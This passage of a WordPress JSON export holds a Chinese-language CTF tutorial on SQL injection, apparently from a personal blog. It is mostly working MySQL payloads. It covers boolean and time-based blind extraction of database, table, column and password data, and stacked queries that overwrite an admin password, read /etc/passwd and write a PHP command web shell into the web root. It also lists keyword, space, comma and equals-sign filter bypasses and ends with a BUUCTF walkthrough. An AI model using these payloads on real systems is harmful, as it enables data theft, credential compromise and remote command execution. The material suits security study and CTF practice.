--+\n\/\/\u4ece\u7b2c\u4e00\u4e2a\u5b57\u7b26\u5f00\u59cb\u622a\u53d6\u5230\u7b2c31\u4e2a\u5b57\u7b26\n\n\u5982\u679c\u7981\u7528=\u53ef\u4ee5\u7528like\u4ee3\u66ff\uff0c\u7a7a\u683c\u7528\uff08\uff09\u4ee3\u66ff\uff0c\u56de\u663e\u5b57\u7b26\u6570\u6709\u4e0a\u9650\u53ef\u4ee5\u7528right\u7a81\u7834\uff1b\n<\/code><\/pre>\n
3\uff1aBoolean-based Blind SQL Injection\uff08\u5e03\u5c14\u76f2\u6ce8\uff09<\/strong><\/p>\n
\u524d\u63d0\uff1a\u65e0\u6570\u636e\u56de\u663e\uff0c\u65e0\u9519\u8bef\u4fe1\u606f\uff0c\u4f46\u9875\u9762\u5185\u5bb9\u4f1a\u6839\u636e SQL \u6761\u4ef6\u771f\u5047\u800c\u53d8\u5316\uff08\u5982\u201c\u5b58\u5728\/\u4e0d\u5b58\u5728\u201d\u3001\u201c\u767b\u5f55\u6210\u529f\/\u5931\u8d25\u201d\uff09\u3002<\/p>\n
\u539f\u7406\uff1a\u901a\u8fc7\u6784\u9020 AND \u6761\u4ef6\uff0c\u89c2\u5bdf\u9875\u9762\u5dee\u5f02\uff08\u5e03\u5c14\u54cd\u5e94\uff09\u6765\u9010\u4f4d\u731c\u89e3\u6570\u636e\u3002<\/p>\n
\u5224\u65ad\uff1a<\/p>\n
' AND 1=1--   \/\/\u9875\u9762\u6b63\u5e38\uff08\u5982\u663e\u793a\u5546\u54c1\uff09\n' AND 1=2--   \/\/\u9875\u9762\u5f02\u5e38\uff08\u5982\u201c\u65e0\u7ed3\u679c\u201d\uff09<\/code><\/pre>\n
\u5229\u7528\uff1a<\/p>\n
\u5e38\u7528\u51fd\u6570\uff1a\ndatabase()      \/\/\u663e\u793a\u6570\u636e\u5e93\u540d\u79f0\nleft(a,b)      \/\/\u4ece\u5de6\u4fa7\u622a\u53d6a\u7684\u524db\u4f4d\nsubstr(a,b,c) \u00a0\u00a0\u00a0\u00a0\/\/\u4eceb\u4f4d\u7f6e\u5f00\u59cb\uff0c\u622a\u53d6\u5b57\u7b26\u4e32a\u7684c\u957f\u5ea6\nmid(a,b,c)        \/\/\u4ece\u4f4d\u7f6eb\u5f00\u59cb\uff0c\u622a\u53d6a\u5b57\u7b26\u4e32\u7684c\u4f4d\nlength()      \u00a0\u00a0\u00a0\u00a0\/\/\u8fd4\u56de\u5b57\u7b26\u4e32\u7684\u957f\u5ea6\nAscii()           \/\/\u5c06\u67d0\u4e2a\u5b57\u7b26\u8f6c\u6362\u4e3aascii\u503c\nchar()            \/\/\u5c06ASCII\u7801\u8f6c\u6362\u4e3a\u5bf9\u5e94\u7684\u5b57\u7b26\n\n\u6784\u9020\uff1a\n' AND LENGTH(DATABASE())=5--\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\/\/\u731c\u6570\u636e\u5e93\u540d\u957f\u5ea6\n'and left(database(),1)>'a'--+\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n' AND SUBSTR(DATABASE(),1,1)='s'--\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\/\/\u731c\u6570\u636e\u5e93\u540d\u9996\u5b57\u6bcd\n' AND ASCII(SUBSTR(DATABASE(),1,1))=115--\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\/\/\u731cASCII\u503c\uff08\u4fbf\u4e8e\u81ea\u52a8\u5316\uff09\n\n(ASCII(SUBSTR(database(),{},1))={})\n(ASCII(SUBSTR((SELECT(group_concat(table_name))FROM(information_schema.tables)WHERE(table_schema=DATABASE())),{},1))={})\n(ASCII(SUBSTR((SELECT(group_concat(column_name))FROM(information_schema.columns)WHERE(table_name=\"F1naI1y\")),{},1))={})\n(ASCII(SUBSTR((SELECT(group_concat(password))FROM(F1naI1y)),{},1))={})<\/code><\/pre>\n
4\uff1aTime-based Blind SQL Injection\uff08\u65f6\u95f4\u76f2\u6ce8\uff09<\/strong><\/p>\n
\u524d\u63d0\uff1a\u65e0\u4efb\u4f55\u56de\u663e\u5dee\u5f02\uff08\u9875\u9762\u5185\u5bb9\u548c\u72b6\u6001\u7801\u59cb\u7ec8\u76f8\u540c\uff09\uff0c\u4f46\u53ef\u901a\u8fc7\u63a7\u5236\u6570\u636e\u5e93\u54cd\u5e94\u65f6\u95f4\u6765\u5224\u65ad\u6761\u4ef6\u771f\u5047\u3002<\/p>\n
\u539f\u7406\uff1a\u5229\u7528 SLEEP()<\/code> \u6216 BENCHMARK()<\/code> \u51fd\u6570\u5236\u9020\u5ef6\u8fdf<\/p>\n
\u5224\u65ad\uff1a<\/p>\n
' AND SLEEP(5)--\n\/\/\u5982\u679c\u54cd\u5e94\u5ef6\u8fdf 5 \u79d2\u4ee5\u4e0a\uff0c\u8bf4\u660e\u5b58\u5728\u65f6\u95f4\u76f2\u6ce8<\/code><\/pre>\n
\u5229\u7528\uff1a<\/p>\n
' AND IF(ASCII(SUBSTR(DATABASE(),1,1))=115, SLEEP(5), 0)--\n\/\/\u8ddf\u5e03\u5c14\u76f2\u6ce8\u5dee\u4e0d\u591a\u7684\u6784\u9020\uff0c\u53ea\u662f\u5224\u65ad\u65b9\u6cd5\u66f4\u7262\u4e00\u4e9b<\/code><\/pre>\n
5\uff1aStacked Queries\uff08\u5806\u53e0\u67e5\u8be2\uff09<\/strong><\/p>\n
\u524d\u63d0\uff1a\u6570\u636e\u5e93\u9a71\u52a8\u652f\u6301\u6267\u884c\u591a\u6761 SQL \u8bed\u53e5\uff08\u4ee5 ;<\/code> \u5206\u9694\uff09<\/p>\n
\u539f\u7406\uff1a\u7565<\/p>\n
\u5224\u65ad\uff1a<\/p>\n
'; SELECT SLEEP(5); --\n\/\/\u5982\u679c\u54cd\u5e94\u5ef6\u8fdf5\u79d2\u4ee5\u4e0a\uff0c\u8bf4\u660e\u5b58\u5728\u5806\u53e0\u67e5\u8be2<\/code><\/pre>\n
\u5229\u7528\uff1a<\/p>\n
'; UPDATE users SET password='hacked' WHERE username='admin'; --\n\/\/\u4fee\u6539\u6570\u636e\n\n'; SELECT '<?php system($_GET[\"cmd\"]); ?>' INTO OUTFILE '\/var\/www\/html\/shell.php'; --\n\/\/\u4e0a\u4f20\u6728\u9a6c\n\n'; SELECT LOAD_FILE('\/etc\/passwd'); --\n\/\/\u8bfb\u53d6\u6587\u4ef6<\/code><\/pre>\n
4\uff1a\u7ed5\u8fc7\u8fc7\u6ee4\uff1a<\/h3>\n
1\uff1a\u5173\u952e\u5b57\u8fc7\u6ee4\uff1a<\/strong><\/p>\n
sel<>ect\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\/\/<>\u7ed5\u8fc7\nsel\/**\/ect\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\/\/**\/\/\u7ed5\u8fc7\n\u4e5f\u53ef\u4ee5\u8bd5\u8bd5\u5927\u5c0f\u5199\u6df7\u5408\u7ed5\u8fc7\uff0curl\u7f16\u7801\u7ed5\u8fc7\uff0c16\u8fdb\u5236\u7f16\u7801\u7ed5\u8fc7\uff0cASCII\u7f16\u7801\u7ed5\u8fc7\nCONCAT('se','lect * from `users`;')\u5229\u7528\u9884\u7f16\u8bd1\u7ed5\u8fc7\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u9884\u7f16\u8bd1\u76f8\u5173\u8bed\u6cd5\u5982\u4e0b\uff1a\n\u3000\u3000\u3000\u3000set\u7528\u4e8e\u8bbe\u7f6e\u53d8\u91cf\u540d\u548c\u503c\n\u3000\u3000\u3000\u3000prepare\u7528\u4e8e\u9884\u5907\u4e00\u4e2a\u8bed\u53e5\uff0c\u5e76\u8d4b\u4e88\u540d\u79f0\uff0c\u4ee5\u540e\u53ef\u4ee5\u5f15\u7528\u8be5\u8bed\u53e5\n\u3000\u3000\u3000\u3000execute\u6267\u884c\u8bed\u53e5\n\u3000\u3000\u3000\u3000deallocate prepare\u7528\u6765\u91ca\u653e\u6389\u9884\u5904\u7406\u7684\u8bed\u53e5\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u4f8b\uff1a-1';use supersqli;set @sql = CONCAT('se','lect * from `1919810931114514`;');prepare a from @sql;execute a;#\n<\/code><\/pre>\n
2\uff1a\u9017\u53f7\u8fc7\u6ee4\uff1a<\/strong><\/p>\n
union select 1,2,3=union select * from (select 1)a join (select 2)b join (select 3)\n\/\/join\uff1asql\u4e2d\u7528\u4e8e\u7ec4\u5408\u591a\u4e2a\u8868\u7684\u6570\u636e\u7684\u6838\u5fc3\u8bed\u53e5\u3002\u5b83\u7684\u672c\u8d28\u662f\u6839\u636e\u67d0\u4e9b\u6761\u4ef6\uff0c\u628a\u4e24\u4e2a\uff08\u6216\u591a\u4e2a\uff09\u8868\u7684\u884c\u201c\u62fc\u63a5\u201d\u5728\u4e00\u8d77\u3002\n\n\u5bf9\u4e8esubstr\u548cmid()\u53ef\u4ee5\uff1a\nsubstr(str from pos for len) \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\/\/\u5728str\u4e2d\u4ece\u7b2cpos\u4f4d\u622a\u53d6len\u957f\u7684\u5b57\u7b26\nmid(str from pos for len)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\/\/\u5728str\u4e2d\u4ece\u7b2cpos\u4f4d\u622a\u53d6len\u957f\u7684\u5b57\u7b26\n\n\u5bf9\u4e8elimit\uff1a\nlimit 1\uff08\u53ea\u8fd4\u56de\u4e00\u884c\uff09 offset 1\uff08\u8df3\u8fc7\u7b2c\u4e00\u884c\uff09<\/code><\/pre>\n
3\u3001\u8fc7\u6ee4\u7a7a\u683c\uff1a<\/strong><\/p>\n
\u53cc\u7a7a\u683c \n\/**\/\u4ee3\u66ff\n\u7528\u62ec\u53f7\u7ed5\u8fc7 \n\u7528\u56de\u8f66\u4ee3\u66ff \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\/\/ascii\u7801\u4e3achr(13)&chr(10)\uff0curl\u7f16\u7801\u4e3a%0d%0a\n${IFS}\u6216$9IFS<\/code><\/pre>\n
4\u3001\u8fc7\u6ee4\u7b49\u53f7<\/strong>\uff1a<\/p>\n
\u7528like \u3001rlike \u3001regexp\u548cbetween\u6216\u8005\u4f7f\u7528< \u6216\u8005 >\u4ee3\u66ff\nLIKE\uff1a    \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0SUBSTRING(VERSION(),1,1)LIKE(5)\nNOT IN\uff1a    \u00a0\u00a0\u00a0\u00a0SUBSTRING(VERSION(),1,1)NOT IN(4,3)\nIN\uff1a    \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0SUBSTRING(VERSION(),1,1)IN(4,3)\nBETWEEN\uff1a\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0SUBSTRING(VERSION(),1,1) BETWEEN 3 AND 4<\/code><\/pre>\n
5\u3001\u8fc7\u6ee4\u5927\u4e8e\u5c0f\u4e8e\u53f7:<\/strong><\/p>\n
greatest(n1,n2,n3,...)        \/\/\u8fd4\u56de\u5176\u4e2d\u7684\u6700\u5927\u503c\nstrcmp(str1,str2)        \/\/\u5f53str1=str2\uff0c\u8fd4\u56de0\uff0c\u5f53str1>str2\uff0c\u8fd4\u56de1\uff0c\u5f53str1<str2\uff0c\u8fd4\u56de-1\nin \u64cd\u4f5c\u7b26\nbetween   and        \/\/\u9009\u53d6\u4ecb\u4e8e\u4e24\u4e2a\u503c\u4e4b\u95f4\u7684\u6570\u636e\u8303\u56f4\u3002\u8fd9\u4e9b\u503c\u53ef\u4ee5\u662f\u6570\u503c\u3001\u6587\u672c\u6216\u8005\u65e5\u671f\u3002<\/code><\/pre>\n
6.\u7b49\u4ef7\u51fd\u6570\u7ed5\u8fc7:<\/strong><\/p>\n
hex()\u3001bin() ==> ascii() \nsleep() ==>benchmark() \nconcat_ws()==>group_concat() \nmid()\u3001substr() ==> substring() \n@@user ==> user() \n@@datadir ==> datadir() \n\u4e3e\u4f8b\uff1asubstring()\u548csubstr()\u65e0\u6cd5\u4f7f\u7528\u65f6\uff1a?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74\u3000 \n\u6216\u8005\uff1a substr((select 'password'),1,1) = 0x70 \nstrcmp(left('password',1), 0x69) = 1 \nstrcmp(left('password',1), 0x70) = 0 \nstrcmp(left('password',1), 0x71) = -1\nselect==>show\nselect==>handler\uff1a\n\u89e3\u91ca\uff1a\u901a\u8fc7handler\u8bed\u53e5\u67e5\u8be2users\u8868\u7684\u5185\u5bb9\n\u3000\u3000\u3000\u3000handler users open as yunensec; #\u6307\u5b9a\u6570\u636e\u8868\u8fdb\u884c\u8f7d\u5165\u5e76\u5c06\u8fd4\u56de\u53e5\u67c4\u91cd\u547d\u540d\n\u3000\u3000\u3000\u3000handler yunensec read first; #\u8bfb\u53d6\u6307\u5b9a\u8868\/\u53e5\u67c4\u7684\u9996\u884c\u6570\u636e\n\u3000\u3000\u3000\u3000handler yunensec read next; #\u8bfb\u53d6\u6307\u5b9a\u8868\/\u53e5\u67c4\u7684\u4e0b\u4e00\u884c\u6570\u636e\n\u3000\u3000\u3000\u3000handler yunensec read next; #\u8bfb\u53d6\u6307\u5b9a\u8868\/\u53e5\u67c4\u7684\u4e0b\u4e00\u884c\u6570\u636e<\/code><\/pre>\n
7\uff1a\u7b26\u53f7\u548c\u5b57\u6bcd\u76f8\u4e92\u4ee3\u66ff<\/strong>\uff1a<\/p>\n
AND:&&\nOR:\u6216`\n=:LIKE, REGEXP, BETWEEN\n>:NOT BETWEEN 0 AND X\nWHERE:HAVING<\/code><\/pre>\n
\u4e00\u4e9b\u795e\u5947\u601d\u8def\uff1a<\/h3>\n
\u5982\u679cselect\u88abban\uff0c\u800c\u4e14\u7ed5\u4e0d\u8fc7\uff0c\u53ef\u4ee5\u5c1d\u8bd5\u5bf9\u672c\u6765\u7684\u8868\uff0c\u5217\u8fdb\u884c\u91cd\u547d\u540d\u4ee5\u5229\u7528\u540e\u7aef\u672c\u6765\u5c31\u6709\u7684select\n\u6bd4\u5982\u6709\u4e24\u4e2a\u8868\uff0c\u4e00\u4e2a\u662fwords\u4e00\u4e2a\u662f114514\uff0c\u672c\u6765\u7684\u67e5\u5bfb\u662fselect * from words where id=''\uff0cdata=\u2018\u2019,\u7136\u540eflag\u5728114514\u4e2d\uff0c\u90a3\u4e48\u53ef\u4ee5\u5c06words\u91cd\u547d\u540d\u4e3aword1\u5c06114514\u91cd\u547d\u540d\u4e3awords\u518d\u63d2\u5165id\u5217\u5e76\u4e14\u8bbe\u7f6e\u9ed8\u8ba4\u503c\uff0c\u7136\u540e\u5c06flag\u5217\u91cd\u547d\u540d\u4e3adata\uff0c\u518d\u62531' or 1=1 #\u5c31\u53ef\u4ee5\u4e86\n\u4f8b\uff1a1';rename table words to word2;rename table `1919810931114514` to words;ALTER TABLE words ADD id int(10) DEFAULT '12';ALTER TABLE  words CHANGE flag data VARCHAR(100);-- q\n<\/code><\/pre>\n
\u5229\u7528case when then\u4ee5\u53ca\u6ea2\u51fa\u62a5\u9519\u7206\u7834\uff1a\n\u57fa\u672c\u683c\u5f0f\uff1a\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0CASE 1E0 \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 WHEN `password` REGEXP '^m52FPlDxYyLB.eIzAr!8gxh.$' THEN 1E0 \n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0  ELSE ~0E0 + ~0E0 \n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0END\n\u57fa\u672c\u5229\u7528\uff1a\n \u00a0\u00a0\u00a0\u00a0\u00a0SELECT id FROM tb WHERE id=0 ||CASE+1e0WHEN`flag`REGEXP'^f'THEN+1e0ELSE~0e0+~0e0END;\n\u00a0\u00a0\u00a0\u00a0\u00a0 \/\/\uff08\u8fd9\u91cc ~ \u4e3a\u53d6\u53cd\u64cd\u4f5c\u7b26\uff0c0 \u53d6\u53cd\u5373\u4e3a\u6700\u5927\u503c\uff0c\u518d\u52a0 1 \u6ea2\u51fa\u62a5\u9519\uff09\nregexp\uff0clike\u7684\u533a\u5206\u5927\u5c0f\u5199\u7684\u4f7f\u7528\u65b9\u6cd5\uff1a\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0SELECT 'abc' LIKE 'ABC';\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0SELECT 'abc' LIKE _utf8mb4 'ABC' COLLATE utf8mb4_0900_as_cs;\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0SELECT 'abc' LIKE _utf8mb4 'ABC' COLLATE utf8mb4_bin;\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0SELECT 'abc' LIKE BINARY 'ABC';\n\u7efc\u5408\uff1a\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0SELECT id FROM tb WHERE id=0 ||CASE+1e0WHEN`flag`REGEXP+BINARY'^F'THEN+1e0ELSE~0e0+~0e0ENDD;\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0SELECT id FROM tb WHERE id=0 ||CASE+1e0WHEN`flag`REGEXP'^F'COLLATE'utf8mb4_bin'THEN+1e0ELSE~0e0+~0e0ENDD;\n\u7efc\u5408\u5229\u7528\uff1a\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0username=1'||case+1E0when`password`regexp'^m52FPlDxYyLB.eIzAr!8gxh.$'then+1E0else~0E0+~0E0end||'0&password=123<\/code><\/pre>\n
\u5728mysql\u91cc\u9762\uff0c\u5728\u7528\u4f5c\u5e03\u5c14\u578b\u5224\u65ad\u65f6\uff0c\u4ee5\u6570\u5b57\u5f00\u5934\u7684\u5b57\u7b26\u4e32\u4f1a\u88ab\u5f53\u505a\u6574\u578b\u6570\u3002\n\u5982\uff1awhere password=\u2018xxx\u2019 or \u20181xxxxxxxxx\u2019\uff0c\u90a3\u4e48\u5c31\u76f8\u5f53\u4e8ewhere password=\u2018xxx\u2019 or 1 <\/code><\/pre>\n
select\u88abban\u4e14\u53ef\u4f7f\u7528\u5806\u53e0\u6ce8\u5165\u65f6\uff0c\u53ef\u4ee5\u5c1d\u8bd5\u7528show\u4ee3\u66ff\uff1a\n1\u2019;show databases;\n1\u2019;show tables;\n1\u2019;show columns from FlagHere;<\/code><\/pre>\n
handler\u547d\u4ee4\u67e5\u8be2\u89c4\u5219\uff1a\nhandler table_name open;handler table_name read first;handler table_name close;\nhandler table_name open;handler table_name read first;handler table_name read next;handler table_name close;\n\/\/\u9996\u5148\u6253\u5f00\u6570\u636e\u5e93\uff0c\u5f00\u59cb\u8bfb\u5b83\u7b2c\u4e00\u884c\u6570\u636e\uff0c\u8bfb\u53d6\u6210\u529f\u540e\u8fdb\u884c\u5173\u95ed\u64cd\u4f5c\u3002\n\/\/\u9996\u5148\u6253\u5f00\u6570\u636e\u5e93\uff0c\u5f00\u59cb\u5faa\u73af\u8bfb\u53d6\uff0c\u8bfb\u53d6\u6210\u529f\u540e\u8fdb\u884c\u5173\u95ed\u64cd\u4f5c\u3002<\/code><\/pre>\n
\u4e8c\u6b21\u6ce8\u5165\uff1a\n\u53ef\u80fd\u6709\u4e9bsql\u6ce8\u5165\u662f\u56e0\u4e3a\u586b\u5165\u7684\u4fe1\u606f\u5b58\u50a8\u518d\u8c03\u7528\u4e3asql\u67e5\u8be2\u8bed\u53e5\u5bfc\u81f4\u7684\uff0c\u6bd4\u5982\u5e7f\u544a\u540d\u4f5c\u4e3a\u952e\u67e5\u8be2\u6570\u636e\u5e93<\/code><\/pre>\n
\u4f8b\u9898\uff1a<\/h3>\n
BUUCTF\u5728\u7ebf\u8bc4\u6d4b<\/a><\/p>\n
\u7528\u6237\u540d\u8f93\u51651\uff0c\u5bc6\u7801\u8f93\u51651’\u540e\u62a5\u9519\uff0c\u8bf4\u660e\u662f’\u95ed\u5408\uff0c\u63a8\u6d4b\u4e3a\u8054\u5408\u67e5\u8be2\u6ce8\u5165<\/p>\n
\"91069f56-6e73-49fe-ae7d-3bf0733574c4\"<\/div><\/p>\n
\u5728\u5bc6\u7801\u8f93\u51651' order by 4 #<\/code>\u65f6\u62a5\u9519\u800c\u8f93\u51651' order by 3 #<\/code>\u65f6\u4e0d\u62a5\u9519\uff0c\u8bf4\u660e\u524d\u9762\u7684\u67e5\u8be2\u67093\u5217<\/p>\n
\"1ff39420-fc1b-4771-a116-9f69af0af246\"<\/div><\/p>\n
\u6d4b\u8bd5\u56de\u663e\u5217\u5982\u4e0b\uff1a<\/p>\n
1' union select 1,2,3 #<\/code><\/pre>\n
\u5f97\u5230\u5982\u4e0b\u56de\u663e\uff1a<\/p>\n
\"4c685342-76ba-4118-83c6-e8b6d1c5414d\"<\/div><\/p>\n
\u90a3\u4e48\u56de\u663e\u4fbf\u57282\u8ddf3\u5217<\/p>\n
\u90a3\u4e48\u76f4\u63a5\u5f00\u59cb\u7206\u5e93\u540d\uff1a<\/p>\n
1' UNION SELECT 1,group_concat(DATABASE()), 3 #<\/code><\/pre>\n
\"a7f52549-f58d-4791-b180-1052745a932f\"<\/div><\/p>\n
\u7136\u540e\u5f00\u59cb\u7206\u8868\u540d\uff1a<\/p>\n
' UNION SELECT 1,group_concat(table_name), 3 FROM information_schema.tables WHERE table_schema=DATABASE() #<\/code><\/pre>\n
\u56de\u663e\u5982\u4e0b\uff1a<\/p>\n
\"b50083e9-00f9-4a3d-b1ae-1b71e6443f8f\"<\/div><\/p>\n
\u9898\u76ee\u662fl0ve1ysq1\uff0c\u90a3\u4e48\u76f4\u63a5\u67e5l0ve1ysq1\u8868\uff08\u5148\u67e5\u53e6\u5916\u4e00\u4e2a\u4e5f\u884c\uff0c\u8bd5\u9519\uff09<\/p>\n
\u7136\u540e\u7206\u5217\u540d\uff1a<\/p>\n
1' UNION SELECT 1, group_concat(column_name), 3 FROM information_schema.columns WHERE table_name='l0ve1ysq1' #<\/code><\/pre>\n
\"12f839cf-44dd-4456-b0f3-3583bd497d8f\"<\/div><\/p>\n
\u7136\u540e\u5c31\u662f\u76f4\u63a5\u5f00\u59cb\u7206\u6570\u636e\u4e86\uff1a<\/p>\n
1' UNION SELECT 1, group_CONCAT(username,id,password),3 FROM l0ve1ysq1 #<\/code><\/pre>\n
\"2cc156ec-0343-4d0a-a2bd-b54a99f244d2\"<\/div><\/p>\n
\u5f97\u5230flag<\/p>\n","protected":false},"excerpt":{"rendered":"
sql\u6ce8\u5165\uff1a CTF\u00b7Web\u57fa\u7840 | PureStream & Marblue \u3010\u8d85\u8be6\u7ec6\u7248\u3011SQL\u6ce8\u5165 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-44","post","type-post","status-publish","format-standard","hentry","category-3"],"_links":{"self":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts\/44","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/comments?post=44"}],"version-history":[{"count":1,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts\/44\/revisions"}],"predecessor-version":[{"id":61,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts\/44\/revisions\/61"}],"wp:attachment":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/media?parent=44"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/categories?post=44"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/tags?post=44"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}